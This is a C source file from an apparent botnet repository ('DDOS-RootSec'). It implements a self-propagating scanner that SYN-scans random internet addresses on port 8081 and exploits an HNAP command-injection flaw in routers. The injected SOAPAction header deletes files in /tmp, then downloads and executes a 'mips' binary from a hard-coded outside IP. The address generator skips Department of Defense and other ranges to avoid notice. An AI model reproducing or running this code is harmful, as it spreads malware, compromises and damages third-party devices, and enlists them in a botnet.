Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
R00tS3c
GitHub Repository: R00tS3c/DDOS-RootSec
 Path: blob/master/Botnets/Self Reps/HnaP/hnap_scanner.c
5038 views
1
#define _GNU_SOURCE

2


3
#ifdef DEBUG

4
    #include <stdio.h>

5
#endif

6
#include <unistd.h>

7
#include <stdlib.h>

8
#include <sys/socket.h>

9
#include <arpa/inet.h>

10
#include <sys/select.h>

11
#include <sys/types.h>

12
#include <time.h>

13
#include <fcntl.h>

14
#include <signal.h>

15
#include <errno.h>

16
#include <string.h>

17
#include <linux/ip.h>

18
#include <linux/tcp.h>

19


20
#include "headers/includes.h"

21
#include "headers/hnap.h"

22
#include "headers/table.h"

23
#include "headers/rand.h"

24
#include "headers/util.h"

25
#include "headers/checksum.h"

26


27
int hnapscanner_scanner_pid = 0, hnapscanner_rsck = 0, hnapscanner_rsck_out = 0;

28
char hnapscanner_scanner_rawpkt[sizeof(struct iphdr) + sizeof(struct tcphdr)] = {0};

29
struct hnapscanner_scanner_connection *conn_table;

30
uint32_t hnapscanner_fake_time = 0;

31


32
int hnapscanner_recv_strip_null(int sock, void *buf, int len, int flags)

33
{

34
    int ret = recv(sock, buf, len, flags);

35


36
    if(ret > 0)

37
    {

38
        int i = 0;

39


40
        for(i = 0; i < ret; i++)

41
        {

42
            if(((char *)buf)[i] == 0x00)

43
            {

44
                ((char *)buf)[i] = 'A';

45
            }

46
        }

47
    }

48


49
    return ret;

50
}

51


52
void hnapscanner_scanner_init(void)

53
{

54
    int i = 0;

55
    uint16_t source_port;

56
    struct iphdr *iph;

57
    struct tcphdr *tcph;

58


59
    // Let parent continue on main thread

60
    hnapscanner_scanner_pid = fork();

61
    if(hnapscanner_scanner_pid > 0 || hnapscanner_scanner_pid == -1)

62
        return;

63


64
    LOCAL_ADDR = util_local_addr();

65


66
    rand_init();

67
    hnapscanner_fake_time = time(NULL);

68
    conn_table = calloc(hnapscanner_SCANNER_MAX_CONNS, sizeof(struct hnapscanner_scanner_connection));

69
    for(i = 0; i < hnapscanner_SCANNER_MAX_CONNS; i++)

70
    {

71
        conn_table[i].state = hnapscanner_SC_CLOSED;

72
        conn_table[i].fd = -1;

73
    }

74


75
    // Set up raw socket scanning and payload

76
    if((hnapscanner_rsck = socket(AF_INET, SOCK_RAW, IPPROTO_TCP)) == -1)

77
    {

78
        #ifdef DEBUG

79
            printf("[hnap] failed to initialize raw socket, cannot scan\n");

80
        #endif

81
        exit(0);

82
    }

83
    fcntl(hnapscanner_rsck, F_SETFL, O_NONBLOCK | fcntl(hnapscanner_rsck, F_GETFL, 0));

84
    i = 1;

85
    if(setsockopt(hnapscanner_rsck, IPPROTO_IP, IP_HDRINCL, &i, sizeof(i)) != 0)

86
    {

87
        #ifdef DEBUG

88
            printf("[hnap] failed to set IP_HDRINCL, cannot scan\n");

89
        #endif

90
        close(hnapscanner_rsck);

91
        exit(0);

92
    }

93


94
    do

95
    {

96
        source_port = rand_next() & 0xffff;

97
    }

98
    while(ntohs(source_port) < 1024);

99


100
    iph = (struct iphdr *)hnapscanner_scanner_rawpkt;

101
    tcph = (struct tcphdr *)(iph + 1);

102


103
    // Set up IPv4 header

104
    iph->ihl = 5;

105
    iph->version = 4;

106
    iph->tot_len = htons(sizeof(struct iphdr) + sizeof(struct tcphdr));

107
    iph->id = rand_next();

108
    iph->ttl = 64;

109
    iph->protocol = IPPROTO_TCP;

110


111
    // Set up TCP header

112
    tcph->dest = htons(8081);

113
    tcph->source = source_port;

114
    tcph->doff = 5;

115
    tcph->window = rand_next() & 0xffff;

116
    tcph->syn = TRUE;

117


118
    #ifdef DEBUG

119
        printf("[hnap] scanner process initialized. scanning started.\n");

120
    #endif

121


122
    // Main logic loop

123
    while(TRUE)

124
    {

125
        fd_set fdset_rd, fdset_wr;

126
        struct hnapscanner_scanner_connection *conn;

127
        struct timeval tim;

128
        int last_avail_conn, last_spew, mfd_rd = 0, mfd_wr = 0, nfds;

129


130
        // Spew out SYN to try and get a response

131
        if(hnapscanner_fake_time != last_spew)

132
        {

133
            last_spew = hnapscanner_fake_time;

134


135
            for(i = 0; i < hnapscanner_SCANNER_RAW_PPS; i++)

136
            {

137
                struct sockaddr_in paddr = {0};

138
                struct iphdr *iph = (struct iphdr *)hnapscanner_scanner_rawpkt;

139
                struct tcphdr *tcph = (struct tcphdr *)(iph + 1);

140


141
                iph->id = rand_next();

142
                iph->saddr = LOCAL_ADDR;

143
                iph->daddr = hnapscanner_get_random_ip();

144
                iph->check = 0;

145
                iph->check = checksum_generic((uint16_t *)iph, sizeof(struct iphdr));

146
                tcph->dest = htons(8081);

147
                tcph->seq = iph->daddr;

148
                tcph->check = 0;

149
                tcph->check = checksum_tcpudp(iph, tcph, htons(sizeof(struct tcphdr)), sizeof(struct tcphdr));

150


151
                paddr.sin_family = AF_INET;

152
                paddr.sin_addr.s_addr = iph->daddr;

153
                paddr.sin_port = tcph->dest;

154


155
                sendto(hnapscanner_rsck, hnapscanner_scanner_rawpkt, sizeof(hnapscanner_scanner_rawpkt), MSG_NOSIGNAL, (struct sockaddr *)&paddr, sizeof(paddr));

156
            }

157
        }

158


159
        // Read packets from raw socket to get SYN+ACKs

160
        last_avail_conn = 0;

161
        while(TRUE)

162
        {

163
            int n = 0;

164
            char dgram[1514];

165
            struct iphdr *iph = (struct iphdr *)dgram;

166
            struct tcphdr *tcph = (struct tcphdr *)(iph + 1);

167
            struct hnapscanner_scanner_connection *conn;

168


169
            errno = 0;

170
            n = recvfrom(hnapscanner_rsck, dgram, sizeof(dgram), MSG_NOSIGNAL, NULL, NULL);

171
            if(n <= 0 || errno == EAGAIN || errno == EWOULDBLOCK)

172
                break;

173


174
            if(n < sizeof(struct iphdr) + sizeof(struct tcphdr))

175
                continue;

176
            if(iph->daddr != LOCAL_ADDR)

177
                continue;

178
            if(iph->protocol != IPPROTO_TCP)

179
                continue;

180
            if(tcph->source != htons(8081))

181
                continue;

182
            if(tcph->dest != source_port)

183
                continue;

184
            if(!tcph->syn)

185
                continue;

186
            if(!tcph->ack)

187
                continue;

188
            if(tcph->rst)

189
                continue;

190
            if(tcph->fin)

191
                continue;

192
            if(htonl(ntohl(tcph->ack_seq) - 1) != iph->saddr)

193
                continue;

194


195
            conn = NULL;

196
            for(n = last_avail_conn; n < hnapscanner_SCANNER_MAX_CONNS; n++)

197
            {

198
                if(conn_table[n].state == hnapscanner_SC_CLOSED)

199
                {

200
                    conn = &conn_table[n];

201
                    last_avail_conn = n;

202
                    break;

203
                }

204
            }

205


206
            // If there were no slots, then no point reading any more

207
            if(conn == NULL)

208
                break;

209


210
            conn->dst_addr = iph->saddr;

211
            conn->dst_port = tcph->source;

212
            hnapscanner_setup_connection(conn);

213
        }

214


215
        FD_ZERO(&fdset_rd);

216
        FD_ZERO(&fdset_wr);

217


218
        for(i = 0; i < hnapscanner_SCANNER_MAX_CONNS; i++)

219
        {

220
            int timeout = 5;

221


222
            conn = &conn_table[i];

223
            //timeout = (conn->state > hnapscanner_SC_CONNECTING ? 30 : 5);

224


225
            if(conn->state != hnapscanner_SC_CLOSED && (hnapscanner_fake_time - conn->last_recv) > timeout)

226
            {

227
                close(conn->fd);

228
                conn->fd = -1;

229
                conn->state = hnapscanner_SC_CLOSED;

230
                util_zero(conn->rdbuf, sizeof(conn->rdbuf));

231


232
                continue;

233
            }

234


235
            if(conn->state == hnapscanner_SC_CONNECTING || conn->state == hnapscanner_SC_EXPLOIT_STAGE2 || conn->state == hnapscanner_SC_EXPLOIT_STAGE3)

236
            {

237
                FD_SET(conn->fd, &fdset_wr);

238
                if(conn->fd > mfd_wr)

239
                    mfd_wr = conn->fd;

240
            }

241
            else if(conn->state != hnapscanner_SC_CLOSED)

242
            {

243
                FD_SET(conn->fd, &fdset_rd);

244
                if(conn->fd > mfd_rd)

245
                    mfd_rd = conn->fd;

246
            }

247
        }

248


249
        tim.tv_usec = 0;

250
        tim.tv_sec = 1;

251
        nfds = select(1 + (mfd_wr > mfd_rd ? mfd_wr : mfd_rd), &fdset_rd, &fdset_wr, NULL, &tim);

252
        hnapscanner_fake_time = time(NULL);

253


254
        for(i = 0; i < hnapscanner_SCANNER_MAX_CONNS; i++)

255
        {

256
            conn = &conn_table[i];

257


258
            if(conn->fd == -1)

259
                continue;

260


261
            if(FD_ISSET(conn->fd, &fdset_wr))

262
            {

263
                int err = 0, ret = 0;

264
                socklen_t err_len = sizeof(err);

265


266
                ret = getsockopt(conn->fd, SOL_SOCKET, SO_ERROR, &err, &err_len);

267
                if(err == 0 && ret == 0)

268
                {

269
                    if(conn->state == hnapscanner_SC_EXPLOIT_STAGE2)

270
                    {

271
                        #ifdef DEBUG

272
                            printf("[hnap] FD%d sending payload\n", conn->fd);

273
                        #endif

274


275
						

276
                        util_strcpy(conn->payload_buf,  "POST /HNAP1/ HTTP/1.0\r\nContent-Type: text/xml; charset=\"utf-8\"\r\nSOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://94.177.216.74/mips && chmod +x mips;./mips`\r\nContent-Length: 640\r\n\r\n<?xml version=\"1.0\" encoding=\"utf-8\"?><soap:Envelope xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\" xmlns:soap=\"http://schemas.xmlsoap.org/soap/envelope/\"><soap:Body><AddPortMapping xmlns=\"http://purenetworks.com/HNAP1/\"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>\r\n\r\n");

277
                        send(conn->fd, conn->payload_buf, util_strlen(conn->payload_buf), MSG_NOSIGNAL);

278
                        util_zero(conn->payload_buf, sizeof(conn->payload_buf));

279
                        util_zero(conn->rdbuf, sizeof(conn->rdbuf));

280


281
                        close(conn->fd);

282
                        hnapscanner_setup_connection(conn);

283
                        conn->state = hnapscanner_SC_EXPLOIT_STAGE3;

284


285
                        continue;

286
                    }

287
                    else if(conn->state == hnapscanner_SC_EXPLOIT_STAGE3)

288
                    {

289
                        #ifdef DEBUG

290
                            printf("[hnap] FD%d finnished\n", conn->fd);

291
                        #endif

292


293
                        close(conn->fd);

294
                        conn->fd = -1;

295
                        conn->state = hnapscanner_SC_CLOSED;

296


297
                        continue;

298
                    }

299
                    else

300
                    {

301
                        #ifdef DEBUG

302
                            printf("[hnap] FD%d connected to %d.%d.%d.%d\n", conn->fd, conn->dst_addr & 0xff, (conn->dst_addr >> 8) & 0xff, (conn->dst_addr >> 16) & 0xff, (conn->dst_addr >> 24) & 0xff);

303
                        #endif

304


305
                        conn->state = hnapscanner_SC_EXPLOIT_STAGE2;

306
                    }

307
                }

308
                else

309
                {

310
                    close(conn->fd);

311
                    conn->fd = -1;

312
                    conn->state = hnapscanner_SC_CLOSED;

313


314
                    continue;

315
                }

316
            }

317


318
            if(FD_ISSET(conn->fd, &fdset_rd))

319
            {

320
                while(TRUE)

321
                {

322
                    int ret = 0;

323


324
                    if(conn->state == hnapscanner_SC_CLOSED)

325
                        break;

326


327
                    if(conn->rdbuf_pos == hnapscanner_SCANNER_RDBUF_SIZE)

328
                    {

329
                        memmove(conn->rdbuf, conn->rdbuf + hnapscanner_SCANNER_HACK_DRAIN, hnapscanner_SCANNER_RDBUF_SIZE - hnapscanner_SCANNER_HACK_DRAIN);

330
                        conn->rdbuf_pos -= hnapscanner_SCANNER_HACK_DRAIN;

331
                    }

332


333
                    errno = 0;

334
                    ret = hnapscanner_recv_strip_null(conn->fd, conn->rdbuf + conn->rdbuf_pos, hnapscanner_SCANNER_RDBUF_SIZE - conn->rdbuf_pos, MSG_NOSIGNAL);

335
                    if(ret == 0)

336
                    {

337
                        errno = ECONNRESET;

338
                        ret = -1;

339
                    }

340
                    if(ret == -1)

341
                    {

342
                        if(errno != EAGAIN && errno != EWOULDBLOCK)

343
                        {

344
                            if(conn->state == hnapscanner_SC_EXPLOIT_STAGE2)

345
                            {

346
                                close(conn->fd);

347
                                hnapscanner_setup_connection(conn);

348
                                continue;

349
                            }

350


351
                            close(conn->fd);

352
                            conn->fd = -1;

353
                            conn->state = hnapscanner_SC_CLOSED;

354
                            util_zero(conn->rdbuf, sizeof(conn->rdbuf));

355
                        }

356
                        break;

357
                    }

358


359
                    conn->rdbuf_pos += ret;

360
                    conn->last_recv = hnapscanner_fake_time;

361


362
                    int len = util_strlen(conn->rdbuf);

363
                    conn->rdbuf[len] = 0;

364
                }

365
            }

366
        }

367
    }

368
}

369


370
void hnapscanner_scanner_kill(void)

371
{

372
    kill(hnapscanner_scanner_pid, 9);

373
}

374


375
static void hnapscanner_setup_connection(struct hnapscanner_scanner_connection *conn)

376
{

377
    struct sockaddr_in addr = {0};

378


379
    if(conn->fd != -1)

380
        close(conn->fd);

381


382
    if((conn->fd = socket(AF_INET, SOCK_STREAM, 0)) == -1)

383
    {

384
        return;

385
    }

386


387
    conn->rdbuf_pos = 0;

388
    util_zero(conn->rdbuf, sizeof(conn->rdbuf));

389


390
    fcntl(conn->fd, F_SETFL, O_NONBLOCK | fcntl(conn->fd, F_GETFL, 0));

391


392
    addr.sin_family = AF_INET;

393
    addr.sin_addr.s_addr = conn->dst_addr;

394
    addr.sin_port = conn->dst_port;

395


396
    conn->last_recv = hnapscanner_fake_time;

397


398
    if(conn->state == hnapscanner_SC_EXPLOIT_STAGE2 || conn->state == hnapscanner_SC_EXPLOIT_STAGE3)

399
    {

400
    }

401
    else

402
    {

403
        conn->state = hnapscanner_SC_CONNECTING;

404
    }

405


406
    connect(conn->fd, (struct sockaddr *)&addr, sizeof(struct sockaddr_in));

407
}

408


409
static ipv4_t hnapscanner_get_random_ip(void)

410
{

411
    uint32_t tmp;

412
    uint8_t o1 = 0, o2 = 0, o3 = 0, o4 = 0;

413


414
    do

415
    {

416
        tmp = rand_next();

417


418
        o1 = tmp & 0xff;

419
        o2 = (tmp >> 8) & 0xff;

420
        o3 = (tmp >> 16) & 0xff;

421
        o4 = (tmp >> 24) & 0xff;

422
    }

423
    while(o1 == 127 ||                             // 127.0.0.0/8      - Loopback

424
          (o1 == 0) ||                              // 0.0.0.0/8        - Invalid address space

425
          (o1 == 3) ||                              // 3.0.0.0/8        - General Electric Company

426
          (o1 == 15 || o1 == 16) ||                 // 15.0.0.0/7       - Hewlett-Packard Company

427
          (o1 == 56) ||                             // 56.0.0.0/8       - US Postal Service

428
          (o1 == 10) ||                             // 10.0.0.0/8       - Internal network

429
          (o1 == 192 && o2 == 168) ||               // 192.168.0.0/16   - Internal network

430
          (o1 == 172 && o2 >= 16 && o2 < 32) ||     // 172.16.0.0/14    - Internal network

431
          (o1 == 100 && o2 >= 64 && o2 < 127) ||    // 100.64.0.0/10    - IANA NAT reserved

432
          (o1 == 169 && o2 > 254) ||                // 169.254.0.0/16   - IANA NAT reserved

433
          (o1 == 198 && o2 >= 18 && o2 < 20) ||     // 198.18.0.0/15    - IANA Special use

434
          (o1 >= 224) ||                            // 224.*.*.*+       - Multicast

435
          (o1 == 6 || o1 == 7 || o1 == 11 || o1 == 21 || o1 == 22 || o1 == 26 || o1 == 28 || o1 == 29 || o1 == 30 || o1 == 33 || o1 == 55 || o1 == 214 || o1 == 215) // Department of Defense

436
    );

437
		return INET_ADDR(o1,o2,o3,o4);

438


439


440
}

441


442


443